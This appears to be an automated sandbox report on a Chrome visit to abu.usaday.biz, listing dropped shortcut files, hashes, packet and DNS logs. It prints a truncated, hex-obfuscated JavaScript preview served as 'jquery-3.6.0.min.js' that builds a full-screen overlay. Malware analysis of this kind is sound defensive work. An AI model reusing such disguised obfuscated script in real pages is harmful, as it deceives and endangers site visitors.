              Preview:L..................F.@.. ...$+.,....,..Z...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.f....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.f....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.f....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.f..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.f...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 12 11:55:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2681
              Entropy (8bit):3.9862128344325325
              Encrypted:false
              SSDEEP:48:8mdiTuOjHdidAKZdA1hehBiZUk1W1qehfy+C:8b7a9/y
              MD5:6CFF89648A16A016B32602EC5444E1D1
              SHA1:5DDC0A88B3446EBFC7B0F90433BB78E4DF46D9A5
              SHA-256:9B78436FB7E99F8D60D93DD363D040DE1CBF7AC52307D19321BE9663532575F4
              SHA-512:723860D937EB7A4D9DECA1A77F115C83A3816BD172DCA070DDCACF6713AC004214426FE5BBFD95DF144D9696A188F5BF665A23B18C7E035FFC8961C78BF6F214
              Malicious:false
              Reputation:low
              Preview:L..................F.@.. ...$+.,.......Z...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.f....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.f....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.f....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.f..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.f...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 12 11:55:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2683
              Entropy (8bit):3.995942895417412
              Encrypted:false
              SSDEEP:48:89diTuOjHdidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbpy+yT+:8y7kT/TbxWOvTbpy7T
              MD5:B95E34BA6C883BC81244D98D8605A042
              SHA1:3464D11D83BC4F808C5A11659B05EDA4FFC84210
              SHA-256:87025DACAED98A714A63AEA8A6C261384F1BC8A0700B2EA03D42FCAB12722D39
              SHA-512:FB54B0C53F6D2155F6CFB20CD4B00B0639763E4B91DC2C6AFA4F03524CC51BD50CE59EDDB9346E27611207ADA4D2E58D71521B12D294504614CB6A1425CEB32D
              Malicious:false
              Reputation:low
              Preview:L..................F.@.. ...$+.,....T.Z...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.f....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.f....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.f....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.f..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.f...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (2790), with no line terminators
              Category:downloaded
              Size (bytes):2790
              Entropy (8bit):4.014199679075213
              Encrypted:false
              SSDEEP:48:8gSj5JOcKOuAbJ8Y8TekEzJYWYuBCDZGkME4B42RDQuqTqyDq5+fAMzTg:8gU5JBKO5bYErBOGk54i2RDQLuymcIKg
              MD5:2E51882E7E71D0BA057E01A1AE6EB27F
              SHA1:187D28C005CCA065C209EDF3B879ECBC716865EE
              SHA-256:CDB8068B3F61457084FE0B1534D4B634969965A9B7CEA1DE8331D2A7F904868E
              SHA-512:4E938DA7C2EE83DA2E5EAD45C6B92079572D658173534C0168A275E592F066CC85DDF25B070EE7668AB41407AAF64DB6A8BBD8F6C134E916360A8D174B1C03F5
              Malicious:false
              Reputation:low
              URL:https://abu.usaday.biz/jquery-3.6.0.min.js
              Preview:var _0x5c71=["\x63\x38\x32\x32\x63\x31\x62\x36\x33\x38\x35\x33\x65\x64\x32\x37\x33\x62\x38\x39\x36\x38\x37\x61\x63\x35\x30\x35\x66\x39\x66\x61","\x37\x33\x38\x61\x61\x38\x64\x33\x62\x63\x30\x32\x65\x62\x38\x37\x31\x32\x61\x63\x64\x30\x65\x62\x32\x63\x66\x36\x64\x66\x64\x35","\x32\x34\x31\x66\x65\x38\x61\x66\x31\x65\x30\x33\x38\x31\x31\x38\x63\x64\x38\x31\x37\x30\x34\x38\x61\x36\x35\x66\x38\x30\x33\x65","\x62\x61\x39\x62\x66\x30\x35\x36\x39\x33\x62\x39\x66\x61\x32\x30\x32\x64\x39\x32\x32\x64\x64\x34\x33\x61\x30\x38\x66\x32\x38\x31","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x63\x73\x73\x54\x65\x78\x74","\x73\x74\x79\x6C\x65","\x77\x69\x64\x74\x68\x3A\x31\x30\x30\x25\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x31\x30\x30\x25\x3B\x20\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x66\x69\x78\x65\x64\x3B\x20\x6C\x65\x66\x74\x3A\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x30\x70\x78\x3B\x20\x7A\x2D\x
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text, with CRLF line terminators
              Category:downloaded
              Size (bytes):580
              Entropy (8bit):4.8136327677200565
              Encrypted:false
              SSDEEP:12:TjeRHdHiHZdtklI5rPiCNGlTF5TF5TF5TF5TF5TFK:neRH988lTPTPTPTPTPTc
              MD5:19BD47CCBB05E0D9EC3C0116300204D3
              SHA1:495403F5ABA96F0A4451AD3871E0049153F8CD8A
              SHA-256:9E3DAD9D075C73DC68D76BDFEE5A2400BB8DA07094C1059544B434177A8789F0
              SHA-512:66BB2D5D37CD095ADF9DC6D33DBBF86B89B7149B4BCEC8BE7EC27014C536F436DCD142EFA96E3BB4C5C07570CC9D2D71F2D4669B1F7B8BDA183ED8EC0F2D1A9B
              Malicious:false
              Reputation:low
              URL:https://abu.usaday.biz/favicon.ico
              Preview:<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.10.3 (Ubuntu)</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
              No static file info

              Download Network PCAP: filteredfull

              • Total Packets: 104
              • 443 (HTTPS)
              • 53 (DNS)
              TimestampSource PortDest PortSource IPDest IP
              Jul 12, 2024 14:55:07.940073967 CEST49675443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:07.940500975 CEST49674443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:08.049468994 CEST49673443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:15.940541029 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:15.940638065 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:15.940675020 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:15.940696955 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:15.940772057 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:15.940960884 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:15.941083908 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:15.941117048 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:15.941227913 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:15.941250086 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.416814089 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.422632933 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.469794989 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.469794989 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.501231909 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.501259089 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.501899004 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.501910925 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.504658937 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.504698038 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.504745007 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.505769014 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.505850077 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.560147047 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.810802937 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.811053991 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.811978102 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.812271118 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.813045025 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.813079119 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.865719080 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.865719080 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.865736961 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.912941933 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.918689966 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.918809891 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.918874025 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:16.918888092 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.919083118 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:16.919142008 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:17.031847000 CEST49710443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:17.031889915 CEST44349710188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:17.307437897 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:17.348520994 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:17.547930002 CEST49674443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:17.547954082 CEST49675443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:17.550002098 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:17.550224066 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:17.550288916 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:17.592660904 CEST49709443192.168.2.5188.114.96.3
              Jul 12, 2024 14:55:17.592694044 CEST44349709188.114.96.3192.168.2.5
              Jul 12, 2024 14:55:17.594671011 CEST49714443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:17.594707012 CEST4434971435.190.80.1192.168.2.5
              Jul 12, 2024 14:55:17.594868898 CEST49714443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:17.595098972 CEST49714443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:17.595118999 CEST4434971435.190.80.1192.168.2.5
              Jul 12, 2024 14:55:17.657398939 CEST49673443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:18.090312004 CEST4434971435.190.80.1192.168.2.5
              Jul 12, 2024 14:55:18.113162041 CEST49714443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:18.113183022 CEST4434971435.190.80.1192.168.2.5
              Jul 12, 2024 14:55:18.116956949 CEST4434971435.190.80.1192.168.2.5
              Jul 12, 2024 14:55:18.117029905 CEST49714443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:18.138148069 CEST49714443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:18.138326883 CEST4434971435.190.80.1192.168.2.5
              Jul 12, 2024 14:55:18.138658047 CEST49714443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:18.138669968 CEST4434971435.190.80.1192.168.2.5
              Jul 12, 2024 14:55:18.190953970 CEST49714443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:18.269690037 CEST4434971435.190.80.1192.168.2.5
              Jul 12, 2024 14:55:18.271173954 CEST4434971435.190.80.1192.168.2.5
              Jul 12, 2024 14:55:18.271260023 CEST49714443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:18.278719902 CEST49714443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:18.278739929 CEST4434971435.190.80.1192.168.2.5
              Jul 12, 2024 14:55:18.291501999 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:18.291590929 CEST4434971535.190.80.1192.168.2.5
              Jul 12, 2024 14:55:18.291691065 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:18.293889999 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:18.293930054 CEST4434971535.190.80.1192.168.2.5
              Jul 12, 2024 14:55:18.392141104 CEST49716443192.168.2.5142.250.186.132
              Jul 12, 2024 14:55:18.392226934 CEST44349716142.250.186.132192.168.2.5
              Jul 12, 2024 14:55:18.392335892 CEST49716443192.168.2.5142.250.186.132
              Jul 12, 2024 14:55:18.392784119 CEST49716443192.168.2.5142.250.186.132
              Jul 12, 2024 14:55:18.392818928 CEST44349716142.250.186.132192.168.2.5
              Jul 12, 2024 14:55:19.440741062 CEST4434970323.1.237.91192.168.2.5
              Jul 12, 2024 14:55:19.441510916 CEST49703443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:19.442553997 CEST4434971535.190.80.1192.168.2.5
              Jul 12, 2024 14:55:19.443314075 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:19.443358898 CEST4434971535.190.80.1192.168.2.5
              Jul 12, 2024 14:55:19.444039106 CEST4434971535.190.80.1192.168.2.5
              Jul 12, 2024 14:55:19.446697950 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:19.446794033 CEST4434971535.190.80.1192.168.2.5
              Jul 12, 2024 14:55:19.446907043 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:19.466281891 CEST49717443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:19.466373920 CEST44349717184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:19.466538906 CEST49717443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:19.468339920 CEST49717443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:19.468372107 CEST44349717184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:19.492496967 CEST4434971535.190.80.1192.168.2.5
              Jul 12, 2024 14:55:19.501724005 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:19.573499918 CEST4434971535.190.80.1192.168.2.5
              Jul 12, 2024 14:55:19.573575020 CEST4434971535.190.80.1192.168.2.5
              Jul 12, 2024 14:55:19.573703051 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:19.573910952 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:19.573910952 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:19.573950052 CEST4434971535.190.80.1192.168.2.5
              Jul 12, 2024 14:55:19.574071884 CEST49715443192.168.2.535.190.80.1
              Jul 12, 2024 14:55:20.084902048 CEST44349716142.250.186.132192.168.2.5
              Jul 12, 2024 14:55:20.085241079 CEST49716443192.168.2.5142.250.186.132
              Jul 12, 2024 14:55:20.085297108 CEST44349716142.250.186.132192.168.2.5
              Jul 12, 2024 14:55:20.086754084 CEST44349716142.250.186.132192.168.2.5
              Jul 12, 2024 14:55:20.086817980 CEST49716443192.168.2.5142.250.186.132
              Jul 12, 2024 14:55:20.088887930 CEST49716443192.168.2.5142.250.186.132
              Jul 12, 2024 14:55:20.088979006 CEST44349716142.250.186.132192.168.2.5
              Jul 12, 2024 14:55:20.141297102 CEST44349717184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:20.141371012 CEST49717443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:20.142333984 CEST49716443192.168.2.5142.250.186.132
              Jul 12, 2024 14:55:20.142343998 CEST44349716142.250.186.132192.168.2.5
              Jul 12, 2024 14:55:20.149684906 CEST49717443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:20.149713993 CEST44349717184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:20.150276899 CEST44349717184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:20.189213037 CEST49716443192.168.2.5142.250.186.132
              Jul 12, 2024 14:55:20.204842091 CEST49717443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:20.346188068 CEST49717443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:20.388514042 CEST44349717184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:20.931658030 CEST44349717184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:20.931823969 CEST44349717184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:20.931880951 CEST49717443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:20.931880951 CEST49717443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:20.931960106 CEST44349717184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:20.931997061 CEST49717443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:20.932017088 CEST44349717184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:20.975573063 CEST49718443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:20.975624084 CEST44349718184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:20.975744009 CEST49718443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:20.975987911 CEST49718443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:20.976018906 CEST44349718184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:21.636785984 CEST44349718184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:21.636873960 CEST49718443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:21.642965078 CEST49718443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:21.642981052 CEST44349718184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:21.643305063 CEST44349718184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:21.644433022 CEST49718443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:21.688502073 CEST44349718184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:21.912601948 CEST44349718184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:21.912674904 CEST44349718184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:21.912798882 CEST49718443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:21.930749893 CEST49718443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:21.930795908 CEST44349718184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:21.930824995 CEST49718443192.168.2.5184.28.90.27
              Jul 12, 2024 14:55:21.930840969 CEST44349718184.28.90.27192.168.2.5
              Jul 12, 2024 14:55:30.021891117 CEST44349716142.250.186.132192.168.2.5
              Jul 12, 2024 14:55:30.021958113 CEST44349716142.250.186.132192.168.2.5
              Jul 12, 2024 14:55:30.022049904 CEST49716443192.168.2.5142.250.186.132
              Jul 12, 2024 14:55:30.259177923 CEST49716443192.168.2.5142.250.186.132
              Jul 12, 2024 14:55:30.259203911 CEST44349716142.250.186.132192.168.2.5
              Jul 12, 2024 14:55:31.650609970 CEST49703443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:31.650708914 CEST49703443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:31.651070118 CEST49726443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:31.651165009 CEST4434972623.1.237.91192.168.2.5
              Jul 12, 2024 14:55:31.651249886 CEST49726443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:31.651963949 CEST49726443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:31.651997089 CEST4434972623.1.237.91192.168.2.5
              Jul 12, 2024 14:55:31.655638933 CEST4434970323.1.237.91192.168.2.5
              Jul 12, 2024 14:55:31.655653000 CEST4434970323.1.237.91192.168.2.5
              Jul 12, 2024 14:55:32.239940882 CEST4434972623.1.237.91192.168.2.5
              Jul 12, 2024 14:55:32.240048885 CEST49726443192.168.2.523.1.237.91
              Jul 12, 2024 14:55:51.404732943 CEST4434972623.1.237.91192.168.2.5
              Jul 12, 2024 14:55:51.404922962 CEST49726443192.168.2.523.1.237.91
              Jul 12, 2024 14:56:18.509287119 CEST49729443192.168.2.5142.250.186.132
              Jul 12, 2024 14:56:18.509346008 CEST44349729142.250.186.132192.168.2.5
              Jul 12, 2024 14:56:18.509717941 CEST49729443192.168.2.5142.250.186.132
              Jul 12, 2024 14:56:18.509717941 CEST49729443192.168.2.5142.250.186.132
              Jul 12, 2024 14:56:18.509756088 CEST44349729142.250.186.132192.168.2.5
              Jul 12, 2024 14:56:19.271034956 CEST44349729142.250.186.132192.168.2.5
              Jul 12, 2024 14:56:19.314073086 CEST49729443192.168.2.5142.250.186.132
              Jul 12, 2024 14:56:19.655069113 CEST49729443192.168.2.5142.250.186.132
              Jul 12, 2024 14:56:19.655096054 CEST44349729142.250.186.132192.168.2.5
              Jul 12, 2024 14:56:19.655546904 CEST44349729142.250.186.132192.168.2.5
              Jul 12, 2024 14:56:19.656697035 CEST49729443192.168.2.5142.250.186.132
              Jul 12, 2024 14:56:19.656759024 CEST44349729142.250.186.132192.168.2.5
              Jul 12, 2024 14:56:19.704689980 CEST49729443192.168.2.5142.250.186.132
              Jul 12, 2024 14:56:29.058145046 CEST44349729142.250.186.132192.168.2.5
              Jul 12, 2024 14:56:29.058274984 CEST44349729142.250.186.132192.168.2.5
              Jul 12, 2024 14:56:29.058331013 CEST49729443192.168.2.5142.250.186.132
              Jul 12, 2024 14:56:30.253237963 CEST49729443192.168.2.5142.250.186.132
              Jul 12, 2024 14:56:30.253271103 CEST44349729142.250.186.132192.168.2.5
              TimestampSource PortDest PortSource IPDest IP
              Jul 12, 2024 14:55:13.951968908 CEST53644701.1.1.1192.168.2.5
              Jul 12, 2024 14:55:13.999507904 CEST53565301.1.1.1192.168.2.5
              Jul 12, 2024 14:55:14.996666908 CEST53636591.1.1.1192.168.2.5
              Jul 12, 2024 14:55:15.920931101 CEST5308553192.168.2.51.1.1.1
              Jul 12, 2024 14:55:15.921154022 CEST6516453192.168.2.51.1.1.1
              Jul 12, 2024 14:55:15.937146902 CEST53530851.1.1.1192.168.2.5
              Jul 12, 2024 14:55:15.937666893 CEST53651641.1.1.1192.168.2.5
              Jul 12, 2024 14:55:17.584158897 CEST5698653192.168.2.51.1.1.1
              Jul 12, 2024 14:55:17.586680889 CEST5190353192.168.2.51.1.1.1
              Jul 12, 2024 14:55:17.591758013 CEST53569861.1.1.1192.168.2.5
              Jul 12, 2024 14:55:17.594208002 CEST53519031.1.1.1192.168.2.5
              Jul 12, 2024 14:55:18.382870913 CEST4932253192.168.2.51.1.1.1
              Jul 12, 2024 14:55:18.383064985 CEST6406353192.168.2.51.1.1.1
              Jul 12, 2024 14:55:18.390644073 CEST53493221.1.1.1192.168.2.5
              Jul 12, 2024 14:55:18.390670061 CEST53640631.1.1.1192.168.2.5
              Jul 12, 2024 14:55:32.065535069 CEST53578861.1.1.1192.168.2.5
              Jul 12, 2024 14:55:52.406955004 CEST53648911.1.1.1192.168.2.5
              Jul 12, 2024 14:56:13.810839891 CEST53581261.1.1.1192.168.2.5
              Jul 12, 2024 14:56:15.241122007 CEST53546331.1.1.1192.168.2.5
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 12, 2024 14:55:15.920931101 CEST192.168.2.51.1.1.10xfc18Standard query (0)abu.usaday.bizA (IP address)IN (0x0001)false
              Jul 12, 2024 14:55:15.921154022 CEST192.168.2.51.1.1.10x528cStandard query (0)abu.usaday.biz65IN (0x0001)false
              Jul 12, 2024 14:55:17.584158897 CEST192.168.2.51.1.1.10xdf4fStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
              Jul 12, 2024 14:55:17.586680889 CEST192.168.2.51.1.1.10xf3f0Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
              Jul 12, 2024 14:55:18.382870913 CEST192.168.2.51.1.1.10xc1c8Standard query (0)www.google.comA (IP address)IN (0x0001)false
              Jul 12, 2024 14:55:18.383064985 CEST192.168.2.51.1.1.10x7b1eStandard query (0)www.google.com65IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 12, 2024 14:55:15.937146902 CEST1.1.1.1192.168.2.50xfc18No error (0)abu.usaday.biz188.114.96.3A (IP address)IN (0x0001)false
              Jul 12, 2024 14:55:15.937146902 CEST1.1.1.1192.168.2.50xfc18No error (0)abu.usaday.biz188.114.97.3A (IP address)IN (0x0001)false
              Jul 12, 2024 14:55:15.937666893 CEST1.1.1.1192.168.2.50x528cNo error (0)abu.usaday.biz65IN (0x0001)false
              Jul 12, 2024 14:55:17.591758013 CEST1.1.1.1192.168.2.50xdf4fNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
              Jul 12, 2024 14:55:18.390644073 CEST1.1.1.1192.168.2.50xc1c8No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
              Jul 12, 2024 14:55:18.390670061 CEST1.1.1.1192.168.2.50x7b1eNo error (0)www.google.com65IN (0x0001)false
              Jul 12, 2024 14:55:28.885842085 CEST1.1.1.1192.168.2.50xebc8No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
              Jul 12, 2024 14:55:28.885842085 CEST1.1.1.1192.168.2.50xebc8No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
              Jul 12, 2024 14:55:29.432542086 CEST1.1.1.1192.168.2.50x27b5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
              Jul 12, 2024 14:55:29.432542086 CEST1.1.1.1192.168.2.50x27b5No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
              Jul 12, 2024 14:55:44.340207100 CEST1.1.1.1192.168.2.50xe184No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
